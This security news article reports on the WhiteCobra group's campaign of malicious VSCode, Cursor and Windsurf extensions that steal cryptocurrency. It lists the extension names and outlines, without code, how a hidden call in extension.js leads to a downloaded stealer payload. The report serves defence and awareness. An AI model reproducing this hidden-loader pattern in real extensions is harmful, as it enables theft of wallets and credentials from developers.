WhiteCobra Group Deploys Malicious VSCode Extensions to Steal Cryptocurrency
Analysts at Koi Security have uncovered a campaign by the WhiteCobra hacker group targeting users of VSCode, Cursor, and Windsurf through malicious extensions published on both the Visual Studio Marketplace and the Open VSX registry. Researchers warn that the campaign remains active, as the attackers continue uploading new malware to replace removed extensions.
The First Signs
Last month, Ethereum developer Zak Cole revealed that his wallet had been drained after using the contractshark.solidity-lang extension for the Cursor editor. Cole noted that the extension appeared harmless, featuring a professional-looking icon, detailed description, and more than 54,000 downloads on OpenVSX.
Koi Security has since linked this incident to the WhiteCobra group, which in July 2025 alone stole more than $500,000 in cryptocurrency using a malicious Cursor AI extension.
Why Extensions Are Vulnerable
VSCode, Cursor, and Windsurf all support VSIX extensions—a common package format that makes them cross-compatible across platforms. While this standardization benefits developers, the lack of rigorous vetting on extension repositories has created an ideal attack surface for threat actors.
WhiteCobra exploits this by crafting extensions with convincing descriptions, polished branding, and artificially inflated download counts, giving them the appearance of legitimacy.
Malicious Extensions Identified
Koi Security reports that the following extensions were part of WhiteCobra’s latest campaign:
Open-VSX (Cursor/Windsurf):
- solidity-pro
- kilocode-ai.kilo-code
- nomic-fdn.hardhat-solidity
- oxc-vscode.oxc
- juan-blanco.solidity
- solidity-ethereum-vsc
- solidityethereum
- solidity-ai-ethereum
- solidity-ethereum
- hardhat-solidity
- juan-blanco.vscode-solidity
- nomic-foundation.hardhat-solidity
- nomic-fdn.solidity-hardhat
- Crypto-Extensions.solidity
- Crypto-Extensions.SnowShsoNo
VS Code Marketplace:
- awswhh
- etherfoundrys
- givingblankies
- wgbk
- VitalikButerin-EthFoundation.blan-co
- SnowShoNo
- Crypto-Extensions.SnowShsoNo
- rojo-roblox-vscode
How the Attack Works
The theft begins when the extension’s main file (extension.js) executes. Though nearly identical to the standard “Hello World” template shipped with every VSCode extension, it contains a hidden call that redirects execution to a secondary script (prompt.js).
From there, a payload is downloaded from Cloudflare Pages. Versions are tailored for Windows, macOS on ARM, and macOS on Intel:
- Windows: A PowerShell script runs a Python script, which then executes shellcode to launch the Lumma stealer. This malware harvests data from cryptocurrency wallets, browser credentials, extensions, and messaging apps.
- macOS: A malicious Mach-O binary is executed locally, loading an as-yet unidentified malware family.
WhiteCobra’s Playbook
According to an internal WhiteCobra guide obtained by researchers, the group sets profit targets between $10,000 and $500,000 per campaign. The guide also details instructions for command-and-control setup, social engineering tactics, and promotional strategies to lure unsuspecting users.
Researchers highlight that WhiteCobra operates with high efficiency: after an extension is blocked, the group is often able to launch a new campaign within three hours.
A Call for Stronger Defenses
Analysts stress that repository safeguards are inadequate. Current indicators such as ratings, download counts, and user reviews can be easily manipulated, allowing malicious extensions to spread unchecked. Stronger verification mechanisms, they argue, are urgently needed to protect developers and end users.
